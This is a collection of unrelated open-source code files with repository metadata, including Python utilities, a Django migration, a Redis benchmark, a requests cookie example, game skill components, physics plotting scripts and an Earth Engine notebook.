1fee6a27ba3515c6d93b1874124ed5f7b7d389f4
|
e8cb2241329e57c9a4a5a23f839a352c98c791bc
|
/brainstorm/structure/buffer_views.py
|
dfc17d220d5a800d618b558d39cf7a1e64c4e068
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] |
permissive
|
xiaoerlaigeid/brainstorm
|
cc21cd75a05891d5fd1cff50d5c0e55d31f64d5b
|
8f1fc886faf268b25085fa5c95bf106b1805d766
|
refs/heads/master
| 2021-06-14T16:50:11.653075
| 2017-03-16T08:19:44
| 2017-03-16T08:19:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,752
|
py
|
#!/usr/bin/env python
# coding=utf-8
from __future__ import division, print_function, unicode_literals
from brainstorm.utils import get_by_path
class BufferView(list):
def __init__(self, buffer_names, buffers, full_buffer=None):
super(BufferView, self).__init__(buffers)
if not len(buffers) == len(buffer_names):
raise ValueError("Length mismatch between buffers and names ({} !="
" {})".format(len(buffers), len(buffer_names)))
self._full_buffer = full_buffer
self._buffer_names = tuple(buffer_names)
self._keys = set(buffer_names)
for i, n in enumerate(buffer_names):
self.__dict__[n] = self[i]
def adjust(self, buffer_names, buffers, full_buffer=None):
assert self._buffer_names == tuple(buffer_names)
self._full_buffer = full_buffer
for i, (n, b) in enumerate(zip(buffer_names, buffers)):
self[i] = b
self.__dict__[n] = self[i]
return self
def _asdict(self):
return dict(zip(self._buffer_names, self))
def items(self):
return self._asdict().items()
def keys(self):
return self._asdict().keys()
def values(self):
return self._asdict().values()
def __getitem__(self, item):
if isinstance(item, int):
return super(BufferView, self).__getitem__(item)
if item in self._keys:
return self.__dict__[item]
elif '.' in item:
return get_by_path(self, item)
raise KeyError('{} is not present. Available items are [{}]'
.format(item, ", ".join(sorted(self._keys))))
def __contains__(self, item):
return item in self._buffer_names
|
[
"qwlouse@gmail.com"
] |
qwlouse@gmail.com
|
97299d77812c63fa7f1e4f9466025b8724f95166
|
33b7a63d0866f9aabfdfdc342236191bebd1c1e6
|
/django_learning/chapter09/xss/xss_demo/front/migrations/0001_initial.py
|
d390906c9e092b0c32fa2850951a7f2870b4ceff
|
[] |
no_license
|
leolvcl/leo_python
|
21f61bb898f8c755d1ff405f90864887e18a317e
|
5be0d897eeee34d50d835707112fb610de69b4c8
|
refs/heads/master
| 2020-08-02T21:00:01.808704
| 2019-12-06T17:04:59
| 2019-12-06T17:04:59
| 211,505,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 497
|
py
|
# Generated by Django 2.0.2 on 2018-05-16 02:54
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
],
),
]
|
[
"lvclleo@gmail.com"
] |
lvclleo@gmail.com
|
6855119c71a47bc978c06db2bab99f04d55fa0bb
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/oLmAshdKHWLP3ck7e_24.py
|
bd6dca045b9dcd263e67ceb1e39236707e84e75a
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
def min_difference_pair(nums):
best = abs(nums[0])
r = []
for i in range(len(nums)):
for j in range(i + 1, len(nums)):
now = abs(nums[i] - nums[j])
if now < best:
best = now
r = sorted([nums[i], nums[j]])
elif now == best:
if sum(r) > sum([nums[i], nums[j]]):
r = sorted([nums[i], nums[j]])
return r
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
ee749b64ebe34821da17751d091a13b06dbf8a81
|
27ad9461526e9a87b66a01306b48470d7dea9800
|
/src/SpringLeaf_subset.py
|
3d4f305d0d9c9c463cf36a0f575427baeadbb087
|
[] |
no_license
|
aocampor/SpringLeafKaggle
|
100aeab631af76ed535dd700bfb1294c161e0880
|
02d89f31cbc6a615db9b035efe4a8083f7f9188c
|
refs/heads/master
| 2016-08-04T10:17:56.011049
| 2015-09-22T16:34:19
| 2015-09-22T16:34:19
| 42,946,548
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 233
|
py
|
import os, sys
if __name__ == "__main__":
file1 = open("Data/train.csv", "r")
i = 0
for line in file1:
lintok = line.rsplit(',')
print line
i = i + 1
if( i == 10000):
break
|
[
"alocampor@gmail.com"
] |
alocampor@gmail.com
|
c4795d1ec0e1b486ef8807813294a6243626829d
|
0739ea9aef038d50d2d8adfae53938795f921417
|
/examples/benchmarks/hiredis_test.py
|
cf16da355872a6011295538c60b14d8ab9aa3804
|
[
"BSD-2-Clause-Views"
] |
permissive
|
vtheno/asyncio-redis
|
b51bf2c5ba265c56134532797ed2d683ffaf1209
|
a57a528d1bdf14be12953f8bf96df2f3ed24b840
|
refs/heads/master
| 2020-09-23T19:24:10.243603
| 2019-12-03T08:28:54
| 2019-12-03T08:28:54
| 225,567,864
| 0
| 0
|
NOASSERTION
| 2019-12-03T08:25:49
| 2019-12-03T08:25:48
| null |
UTF-8
|
Python
| false
| false
| 3,185
|
py
|
#!/usr/bin/env python
"""
Compare how fast HiRedisProtocol is compared to the pure Python implementation
for a few different benchmarks.
"""
import asyncio
import asyncio_redis
import time
try:
import hiredis
except ImportError:
hiredis = None
from asyncio_redis.protocol import HiRedisProtocol
@asyncio.coroutine
def test1(connection):
""" Del/get/set of keys """
yield from connection.delete(['key'])
yield from connection.set('key', 'value')
result = yield from connection.get('key')
assert result == 'value'
@asyncio.coroutine
def test2(connection):
""" Get/set of a hash of 100 items (with _asdict) """
d = { str(i):str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.hmset('key', d)
result = yield from connection.hgetall_asdict('key')
assert result == d
@asyncio.coroutine
def test3(connection):
""" Get/set of a hash of 100 items (without _asdict) """
d = { str(i):str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.hmset('key', d)
result = yield from connection.hgetall('key')
d2 = {}
for f in result:
k,v = yield from f
d2[k] = v
assert d2 == d
@asyncio.coroutine
def test4(connection):
""" sadd/smembers of a set of 100 items. (with _asset) """
s = { str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.sadd('key', list(s))
s2 = yield from connection.smembers_asset('key')
assert s2 == s
@asyncio.coroutine
def test5(connection):
""" sadd/smembers of a set of 100 items. (without _asset) """
s = { str(i) for i in range(100) }
yield from connection.delete(['key'])
yield from connection.sadd('key', list(s))
result = yield from connection.smembers('key')
s2 = set()
for f in result:
i = yield from f
s2.add(i)
assert s2 == s
benchmarks = [
(1000, test1),
(100, test2),
(100, test3),
(100, test4),
(100, test5),
]
def run():
connection = yield from asyncio_redis.Connection.create(host='localhost', port=6379)
if hiredis:
hiredis_connection = yield from asyncio_redis.Connection.create(host='localhost', port=6379, protocol_class=HiRedisProtocol)
try:
for count, f in benchmarks:
print('%ix %s' % (count, f.__doc__))
# Benchmark without hredis
start = time.time()
for i in range(count):
yield from f(connection)
print(' Pure Python: ', time.time() - start)
# Benchmark with hredis
if hiredis:
start = time.time()
for i in range(count):
yield from f(hiredis_connection)
print(' hiredis: ', time.time() - start)
print()
else:
print(' hiredis: (not available)')
finally:
connection.close()
if hiredis:
hiredis_connection.close()
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
|
[
"jonathan@slenders.be"
] |
jonathan@slenders.be
|
7b77ab771feda6d519910a539c1f19e5644f000a
|
b864b992187e2e1c5c8da6fdabeeab5040058fe9
|
/Python Example/python-scraping-master/chapter9/3-cookies.py
|
6e66f04ccd21321913b9a0e62aa1a20b8e046a88
|
[] |
no_license
|
Mr-Phoebe/ProgramLanguage
|
5384afeef20c8a12cd89cf3720beb0337bd38fc9
|
1588aea62e15304339efb73d55653be1b4e57156
|
refs/heads/master
| 2023-02-06T11:59:06.272680
| 2023-02-06T04:00:14
| 2023-02-06T04:00:14
| 65,252,634
| 52
| 37
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 366
|
py
|
import requests
params = {'username': 'Ryan', 'password': 'password'}
r = requests.post("http://pythonscraping.com/pages/cookies/welcome.php", params)
print("Cookie is set to:")
print(r.cookies.get_dict())
print("-----------")
print("Going to profile page...")
r = requests.get("http://pythonscraping.com/pages/cookies/profile.php", cookies=r.cookies)
print(r.text)
|
[
"whn289467822@outlook.com"
] |
whn289467822@outlook.com
|
d2a3dc5f7164f1b606f5b0a11bad3d656716af12
|
425b5719ecf6b40bf3de94ddf6e0cc9cf72717b7
|
/app/engine/skill_components/charge_components.py
|
e879b21be2baee20d970ef87e0c7dbc70eb2cfec
|
[
"MIT"
] |
permissive
|
zerorock1312/lt-maker-master
|
3b9b2e7245215936018601432a98915c40f3937d
|
82f733683f9dba763a5de8567c41fd7cbcfb0173
|
refs/heads/main
| 2023-06-04T10:28:43.931841
| 2021-06-18T06:03:40
| 2021-06-18T06:03:40
| 378,050,560
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,472
|
py
|
from app.data.skill_components import SkillComponent
from app.data.components import Type
from app.engine import action
class BuildCharge(SkillComponent):
nid = 'build_charge'
desc = "Skill gains charges until full"
tag = "charge"
expose = Type.Int
value = 10
ignore_conditional = True
def init(self, skill):
self.skill.data['charge'] = 0
self.skill.data['total_charge'] = self.value
def condition(self, unit):
return self.skill.data['charge'] >= self.skill.data['total_charge']
def on_end_chapter(self, unit, skill):
self.skill.data['charge'] = 0
def trigger_charge(self, unit, skill):
action.do(action.SetObjData(self.skill, 'charge', 0))
def text(self) -> str:
return str(self.skill.data['charge'])
def cooldown(self):
return self.skill.data['charge'] / self.skill.data['total_charge']
class DrainCharge(SkillComponent):
nid = 'drain_charge'
desc = "Skill will have a number of charges that are drained by 1 when activated"
tag = "charge"
expose = Type.Int
value = 1
ignore_conditional = True
def init(self, skill):
self.skill.data['charge'] = self.value
self.skill.data['total_charge'] = self.value
def condition(self, unit):
return self.skill.data['charge'] > 0
def on_end_chapter(self, unit, skill):
self.skill.data['charge'] = self.skill.data['total_charge']
def trigger_charge(self, unit, skill):
new_value = self.skill.data['charge'] - 1
action.do(action.SetObjData(self.skill, 'charge', new_value))
def text(self) -> str:
return str(self.skill.data['charge'])
def cooldown(self):
return self.skill.data['charge'] / self.skill.data['total_charge']
def get_marks(playback, unit, item):
from app.data.database import DB
marks = [mark for mark in playback if mark[0] == 'mark_hit']
marks += [mark for mark in playback if mark[0] == 'mark_crit']
if DB.constants.value('miss_wexp'):
marks += [mark for mark in playback if mark[0] == 'mark_miss']
marks = [mark for mark in marks if mark[1] == unit and mark[2] != unit and mark[4] == item]
return marks
class CombatChargeIncrease(SkillComponent):
nid = 'combat_charge_increase'
desc = "Increases charge of skill each combat"
tag = "charge"
expose = Type.Int
value = 5
ignore_conditional = True
def end_combat(self, playback, unit, item, target, mode):
marks = get_marks(playback, unit, item)
if not self.skill.data.get('active') and marks:
new_value = self.skill.data['charge'] + self.value
new_value = min(new_value, self.skill.data['total_charge'])
action.do(action.SetObjData(self.skill, 'charge', new_value))
class CombatChargeIncreaseByStat(SkillComponent):
nid = 'combat_charge_increase_by_stat'
desc = "Increases charge of skill each combat"
tag = "charge"
expose = Type.Stat
value = 'SKL'
ignore_conditional = True
def end_combat(self, playback, unit, item, target, mode):
marks = get_marks(playback, unit, item)
if not self.skill.data.get('active') and marks:
new_value = self.skill.data['charge'] + unit.stats[self.value] + unit.stat_bonus(self.value)
new_value = min(new_value, self.skill.data['total_charge'])
action.do(action.SetObjData(self.skill, 'charge', new_value))
|
[
"85828552+zerorock1312@users.noreply.github.com"
] |
85828552+zerorock1312@users.noreply.github.com
|
6456530f6f5fe8c9d04436f610dd784a925f2956
|
ab197194e6f4a7dae78b4cf72456aff78e71740f
|
/compareResolutionFuncP.py
|
f2da1495ae04835fded68c0180f4b7e631977539
|
[] |
no_license
|
JanFSchulte/MuonResolution
|
b75919e4dabb064476bc71c997a42b916dd039e0
|
e39b4055b654f2b2e93b3b0fdac826fa630b042f
|
refs/heads/master
| 2023-07-02T12:02:40.541267
| 2023-06-06T16:14:45
| 2023-06-06T16:14:45
| 164,695,533
| 0
| 2
| null | 2019-09-13T09:47:52
| 2019-01-08T17:01:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,847
|
py
|
from ROOT import *
import pickle
import math
from setTDRStyle import setTDRStyle
def efficiencyRatio(eff1,eff2):
newEff = TGraphAsymmErrors(eff1.GetN())
for i in range(0,eff1.GetN()):
pointX1 = Double(0.)
pointX2 = Double(0.)
pointY1 = Double(0.)
pointY2 = Double(0.)
isSuccesful1 = eff1.GetPoint(i,pointX1,pointY1)
isSuccesful2 = eff2.GetPoint(i,pointX2,pointY2)
errY1Up = eff1.GetErrorYhigh(i)
errY1Low = eff1.GetErrorYlow(i)
errY2Up = eff2.GetErrorYhigh(i)
errY2Low = eff2.GetErrorYlow(i)
errX = eff1.GetErrorX(i)
if pointY2!=0:
yValue = pointY1/pointY2
xValue = pointX1
xError = errX
#~ yErrorUp = math.sqrt(((1/pointY2)*errY1Up)**2+((pointY1/pointY2**2)*errY2Up)**2)
yErrorUp = math.sqrt(((1/pointY2)*errY1Up)**2+((pointY1/pointY2**2)*errY2Up)**2)
yErrorDown = math.sqrt(((1/pointY2)*errY1Low)**2+((pointY1/pointY2**2)*errY2Low)**2)
else:
yValue = 0
xValue = pointX1
xError = errX
yErrorUp =0
yErrorDown = 0
#~ print i
newEff.SetPoint(i,xValue,yValue)
newEff.SetPointError(i,xError,xError,yErrorDown,yErrorUp)
return newEff
def getRatio(result,result2,label):
masses = result["mass"]
massErr = result["massErr"]
sigma = result["sigma"]
sigmaErr = result["sigmaErr"]
masses2 = result2["mass"]
massErr2 = result2["massErr"]
sigma2 = result2["sigma"]
sigmaErr2 = result2["sigmaErr"]
ratio = TGraphErrors(len(masses))
ratio.SetName(label)
for i,mass in enumerate(masses):
ratio .SetPoint(i,mass,sigma[i]/sigma2[i])
ratio .SetPointError(i,massErr[i],(sigma[i]/sigma2[i])*math.sqrt((sigmaErr[i]/sigma[i])**2+(sigmaErr2[i]/sigma2[i])**2))
return ratio
def getGraph(result,label):
masses = result["mass"]
massErr = result["massErr"]
sigma = result["sigma"]
sigmaErr = result["sigmaErr"]
res = TGraphAsymmErrors(len(masses))
res.SetName(label)
for i,mass in enumerate(masses):
res.SetPoint(i,mass,sigma[i])
res.SetPointError(i,massErr[i],massErr[i],sigmaErr[i],sigmaErr[i])
return res
def compareMassRes(trackType):
cat = ["B","O","E"]
for c in cat:
file2016BB = open("defaultPSplit/PResolutionVsP_%s_%s.pkl"%(trackType,c))
file2017BB = open("cruijffPSplit/PResolutionVsP_%s_%s.pkl"%(trackType,c))
fileCBB = open("crystalPSplit/PResolutionVsP_%s_%s.pkl"%(trackType,c))
results2016BB = pickle.load(file2016BB)
results2017BB = pickle.load(file2017BB)
resultsCBB = pickle.load(fileCBB)
graph2016BB = getGraph(results2016BB,"DCBBB")
graph2017BB = getGraph(results2017BB,"CruijffBB")
graphCBB = getGraph(resultsCBB,"CBB")
ratioBB = getRatio(results2016BB,results2017BB,"ratioBB")
ratioCBB = getRatio(results2016BB,resultsCBB,"ratioCBB")
canv = TCanvas("c1","c1",800,1200)
plotPad = TPad("plotPad","plotPad",0,0.3,1,1)
ratioPad = TPad("ratioPad","ratioPad",0,0.,1,0.3)
style = setTDRStyle()
gStyle.SetOptStat(0)
plotPad.UseCurrentStyle()
ratioPad.UseCurrentStyle()
plotPad.Draw()
ratioPad.Draw()
plotPad.cd()
plotPad.cd()
plotPad.SetGrid()
gStyle.SetTitleXOffset(1.45)
gStyle.SetTitleYOffset(1.55)
xMax = 0.15
if trackType == "Inner":
xMax = 0.3
if trackType == "Outer":
xMax = 0.5
plotPad.DrawFrame(0,0,3100,xMax,";p^{#mu} [GeV]; p^{#mu} resolution")
graph2016BB.Draw("samepe")
graph2017BB.Draw("samepe")
graphCBB.Draw("samepe")
graph2017BB.SetLineColor(kRed)
graph2017BB.SetMarkerColor(kRed)
graphCBB.SetLineColor(kBlue)
graphCBB.SetMarkerColor(kBlue)
latex = TLatex()
latex.SetTextFont(42)
latex.SetTextAlign(31)
latex.SetTextSize(0.04)
latex.SetNDC(True)
latexCMS = TLatex()
latexCMS.SetTextFont(61)
latexCMS.SetTextSize(0.055)
latexCMS.SetNDC(True)
latexCMSExtra = TLatex()
latexCMSExtra.SetTextFont(52)
latexCMSExtra.SetTextSize(0.03)
latexCMSExtra.SetNDC(True)
latex.DrawLatex(0.95, 0.96, "(13 TeV)")
cmsExtra = "#splitline{Preliminary}{}"
latexCMS.DrawLatex(0.19,0.88,"CMS")
if "Simulation" in cmsExtra:
yLabelPos = 0.81
else:
yLabelPos = 0.84
latexCMSExtra.DrawLatex(0.19,yLabelPos,"%s"%(cmsExtra))
leg = TLegend(0.52, 0.76, 0.95, 0.91,"%s %s"%(trackType,c),"brNDC")
leg.SetFillColor(10)
leg.SetFillStyle(0)
leg.SetLineColor(10)
leg.SetShadowColor(0)
leg.SetBorderSize(1)
leg.AddEntry(graph2016BB,"Cruijff","l")
leg.AddEntry(graph2017BB,"Double CB","l")
leg.AddEntry(graphCBB,"Crystal Ball","l")
leg.Draw()
plotPad.RedrawAxis()
ratioPad.cd()
ratioBB.SetLineColor(kRed)
ratioCBB.SetLineColor(kBlue)
ratioPad.DrawFrame(0,0.5,3100,1.5,";ratio")
ratioBB.Draw("samepe")
ratioCBB.Draw("samepe")
canv.Print("pResolutionCompareFunc_%s_%s.pdf"%(trackType,c))
tracks = ["Inner","Outer","Global","TPFMS","Picky","DYT","TunePNew"]
for trackType in tracks:
compareMassRes(trackType)
|
[
"jschulte@cern.ch"
] |
jschulte@cern.ch
|
29793a85a88c5177d18332fa38bda80e0a5ece4c
|
e53cd62a6b0fa27f8f712b7df92897d61b532807
|
/Lesson_1/1.8 If's.py
|
7ef3dc5aa292ee0c6d1eccaeaa3385c9462d279c
|
[] |
no_license
|
AdamSierzan/Python_basics_course_2
|
dc465ed0223347d5f555b835ac89c456fab5699c
|
216ccf66d8a1bccf376564297e60fcfb8cf0696b
|
refs/heads/master
| 2021-05-18T19:51:35.721711
| 2020-04-03T19:58:23
| 2020-04-03T19:58:23
| 251,388,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 334
|
py
|
print("How old are you:")
age = int(input())
responsible = input("Are you responsible:? T/N")
if (age > 100):
print("You're definetly an adult")
elif (age > 18) and responsible == "T":
print("You're a responsible adult")
elif responsible != "T":
print("You're unresponsible adult")
else:
print("You're not an adult")
|
[
"adagioo1993@gmail.com"
] |
adagioo1993@gmail.com
|
da5e1b27e409b9adf9e9630f26cb45c2013b63ba
|
82b997b4e2f7986b3619f49c45410839955f699d
|
/invoke/monkey.py
|
073762f60b33866b49d1073f41c50571aa26fd75
|
[
"BSD-2-Clause"
] |
permissive
|
markatto/invoke
|
a5c81f97fba810270b3a87aeafd1a6689544d340
|
3f2df01d989a325a70826226562ee19ce69e3ac1
|
refs/heads/master
| 2021-01-18T07:14:41.386860
| 2012-07-27T19:58:41
| 2012-07-27T19:58:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,799
|
py
|
# Fuckin' A.
import select, errno, os, sys
from subprocess import Popen as OriginalPopen, mswindows
class Popen(OriginalPopen):
#
# Custom code
#
def __init__(self, *args, **kwargs):
hide = kwargs.pop('hide', [])
super(Popen, self).__init__(*args, **kwargs)
self.hide = hide
def handle(self, stream, data):
stream_name = 'out' if stream is sys.stdout else 'err'
if stream_name not in self.hide:
stream.write(data)
stream.flush()
#
# Copy/modified code from upstream
#
if mswindows:
def _readerthread(self, fh, buffer):
# TODO: How to determine which sys.std(out|err) to use?
buffer.append(fh.read())
else: # Sane operating systems
def _communicate(self, input):
read_set = []
write_set = []
stdout = None # Return
stderr = None # Return
if self.stdin:
# Flush stdio buffer. This might block, if the user has
# been writing to .stdin in an uncontrolled fashion.
self.stdin.flush()
if input:
write_set.append(self.stdin)
else:
self.stdin.close()
if self.stdout:
read_set.append(self.stdout)
stdout = []
if self.stderr:
read_set.append(self.stderr)
stderr = []
input_offset = 0
while read_set or write_set:
try:
rlist, wlist, xlist = select.select(read_set, write_set, [])
except select.error, e:
if e.args[0] == errno.EINTR:
continue
raise
if self.stdin in wlist:
# When select has indicated that the file is writable,
# we can write up to PIPE_BUF bytes without risk
# blocking. POSIX defines PIPE_BUF >= 512
chunk = input[input_offset : input_offset + 512]
bytes_written = os.write(self.stdin.fileno(), chunk)
input_offset += bytes_written
if input_offset >= len(input):
self.stdin.close()
write_set.remove(self.stdin)
if self.stdout in rlist:
data = os.read(self.stdout.fileno(), 1)
if data == "":
self.stdout.close()
read_set.remove(self.stdout)
self.handle(sys.stdout, data)
stdout.append(data)
if self.stderr in rlist:
data = os.read(self.stderr.fileno(), 1)
if data == "":
self.stderr.close()
read_set.remove(self.stderr)
self.handle(sys.stderr, data)
stderr.append(data)
# All data exchanged. Translate lists into strings.
if stdout is not None:
stdout = ''.join(stdout)
if stderr is not None:
stderr = ''.join(stderr)
# Translate newlines, if requested. We cannot let the file
# object do the translation: It is based on stdio, which is
# impossible to combine with select (unless forcing no
# buffering).
if self.universal_newlines and hasattr(file, 'newlines'):
if stdout:
stdout = self._translate_newlines(stdout)
if stderr:
stderr = self._translate_newlines(stderr)
self.wait()
return (stdout, stderr)
|
[
"jeff@bitprophet.org"
] |
jeff@bitprophet.org
|
2c4fb23f9c4fdbb529dd4ae121804e83ea1b1c3f
|
95673dabd649d4e358921182572e26c3ea21b53a
|
/PhysicsAnalysis/JetTagging/JetTagAlgs/BTagging/share/.svn/text-base/BTagging_LifetimeTag1D.py.svn-base
|
ae543dd574131fdbd0959767505ca75b6aa67f7b
|
[] |
no_license
|
zqhsfz/DoubleBTaggingDF
|
141deac5f2eca8763dd25c9d10e8458efcd6dd75
|
80c7c374ea8917c540b7fbfacb84e9e158787269
|
refs/heads/master
| 2020-05-31T07:47:47.525578
| 2015-09-15T20:25:31
| 2015-09-15T20:25:31
| 40,974,366
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,749
|
if BTaggingFlags.Runmodus == 'analysis':
lhVariablesForAnalysis = [ "significance1D" ]
# each tagger needs own instance, can't be shared!
from JetTagTools.JetTagToolsConf import Analysis__LikelihoodTool
myBTagLikelihoodTool1D = Analysis__LikelihoodTool(
name = "myBTagLikelihoodTool1D",
allLhVariables = lhVariablesForAnalysis,
useTheseLhVariables = lhVariablesForAnalysis,
OutputLevel = BTaggingFlags.OutputLevel
)
ToolSvc += myBTagLikelihoodTool1D
if BTaggingFlags.OutputLevel < 3:
print myBTagLikelihoodTool1D
from JetTagTools.JetTagToolsConf import Analysis__LifetimeTag
Z0LifetimeTagTool = Analysis__LifetimeTag(
name = "LifetimeTag1D",
Runmodus = BTaggingFlags.Runmodus,
LifetimeModus = "1D",
OutputLevel = BTaggingFlags.OutputLevel,
TrackToVertexTool = BTagTrackToVertexTool,
LikelihoodTool = myBTagLikelihoodTool1D,
useVariables = lhVariablesForAnalysis
)
# make sure to create all histos when in ref mode (for now there is only one variable in this tagger ...)
if BTaggingFlags.Runmodus == 'reference':
Z0LifetimeTagTool.useVariables = [ "significance1D" ]
ToolSvc += Z0LifetimeTagTool
if BTaggingFlags.OutputLevel < 3:
print Z0LifetimeTagTool
|
[
"zqhsfz@gmail.com"
] |
zqhsfz@gmail.com
|
|
7e94d265c08c9712028dcbc9b5fd76e240275ddf
|
ea3bf64156bbb79544bfd6b42bbcd3eda453ac31
|
/content/Example Based Unit Testing/code-snippets-6/fake_logger.py
|
362f21c1f7b3dad97bc0e4fff2985f291ce72004
|
[
"CC-BY-4.0"
] |
permissive
|
Jackiexiong/software-testing-course
|
563ffc8543fdcff9500f64944fd76e7c0c8e1144
|
3803851dcf9f7bbd0f0b89fca6c9c5e3a48f22e0
|
refs/heads/master
| 2021-07-08T02:10:25.915964
| 2017-10-04T20:50:51
| 2017-10-04T20:50:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
from logger_interface import LoggerInterface
# A logger that prints the message to the console
class FakeLogger(LoggerInterface):
def log(self, msg):
print("Log: {0}".format(msg))
return True
|
[
"rvprasad@ksu.edu"
] |
rvprasad@ksu.edu
|
55d76aefd85c06e28422f30adca73fdf7d8a4245
|
bdc14c302b60114321466cf38f1bf03a75a01eb3
|
/ImageCollection/overview.py
|
8e70ddb38b66a61677a64f3e1860366c6f7b755b
|
[
"MIT"
] |
permissive
|
nishadhka/earthengine-py-notebooks
|
a09392fc83202884c8b36c76263a9e16f7351d40
|
fe3edf5189a424ffbedb42d1bc5ed95ff0af3bdb
|
refs/heads/master
| 2020-12-21T12:38:54.756294
| 2020-01-27T01:48:55
| 2020-01-27T01:48:55
| 236,433,700
| 1
| 0
|
MIT
| 2020-01-27T06:42:20
| 2020-01-27T06:42:19
| null |
UTF-8
|
Python
| false
| false
| 3,776
|
py
|
'''
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/ImageCollection/overview.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/ImageCollection/overview.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=ImageCollection/overview.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/ImageCollection/overview.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
'''
# %%
'''
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The magic command `%%capture` can be used to hide output from a specific cell.
'''
# %%
# %%capture
# !pip install earthengine-api
# !pip install geehydro
# %%
'''
Import libraries
'''
# %%
import ee
import folium
import geehydro
# %%
'''
Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. Uncomment the line `ee.Authenticate()`
if you are running this notebook for this first time or if you are getting an authentication error.
'''
# %%
# ee.Authenticate()
ee.Initialize()
# %%
'''
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
'''
# %%
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
# %%
'''
## Add Earth Engine Python script
'''
# %%
# Create arbitrary constant images.
constant1 = ee.Image(1)
constant2 = ee.Image(2)
# Create a collection by giving a list to the constructor.
collectionFromConstructor = ee.ImageCollection([constant1, constant2])
print('collectionFromConstructor: ', collectionFromConstructor.getInfo())
# Create a collection with fromImages().
collectionFromImages = ee.ImageCollection.fromImages(
[ee.Image(3), ee.Image(4)])
print('collectionFromImages: ', collectionFromImages.getInfo())
# Merge two collections.
mergedCollection = collectionFromConstructor.merge(collectionFromImages)
print('mergedCollection: ', mergedCollection.getInfo())
# # Create a toy FeatureCollection
# features = ee.FeatureCollection(
# [ee.Feature({}, {'foo': 1}), ee.Feature({}, {'foo': 2})])
# # Create an ImageCollection from the FeatureCollection
# # by mapping a function over the FeatureCollection.
# images = features.map(function(feature) {
# return ee.Image(ee.Number(feature.get('foo')))
# })
# # Print the resultant collection.
# print('Image collection: ', images)
# %%
'''
## Display Earth Engine data layers
'''
# %%
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
|
[
"giswqs@gmail.com"
] |
giswqs@gmail.com
|
9913227f3817aedd27bdd11f4702d2fbab8d619d
|
36f7e329efaf9f3b37003ef5c769628865f472ec
|
/Swasthya/accounts/views.py
|
ea76f5f4c924b52dfa9e2173a08fa78c0599be15
|
[] |
no_license
|
aolashram/kri-vibe
|
d40080679f7f37568a8b57c2f7009ce6f6bcbbbc
|
6d77600c0c6953c3c78ec9a1fdf5a80c6611e162
|
refs/heads/main
| 2023-05-31T17:50:09.377629
| 2021-06-21T04:38:51
| 2021-06-21T04:38:51
| 378,806,174
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,540
|
py
|
from django.shortcuts import render,redirect,get_object_or_404
from django.http import HttpResponse,HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth import update_session_auth_hash
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.forms import PasswordChangeForm,AuthenticationForm,UserCreationForm
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from django.urls import reverse
from django.contrib import messages
from django.contrib.auth.models import User
from django.urls import reverse_lazy
from django.views.generic import CreateView, View
from django.contrib.auth.decorators import login_required
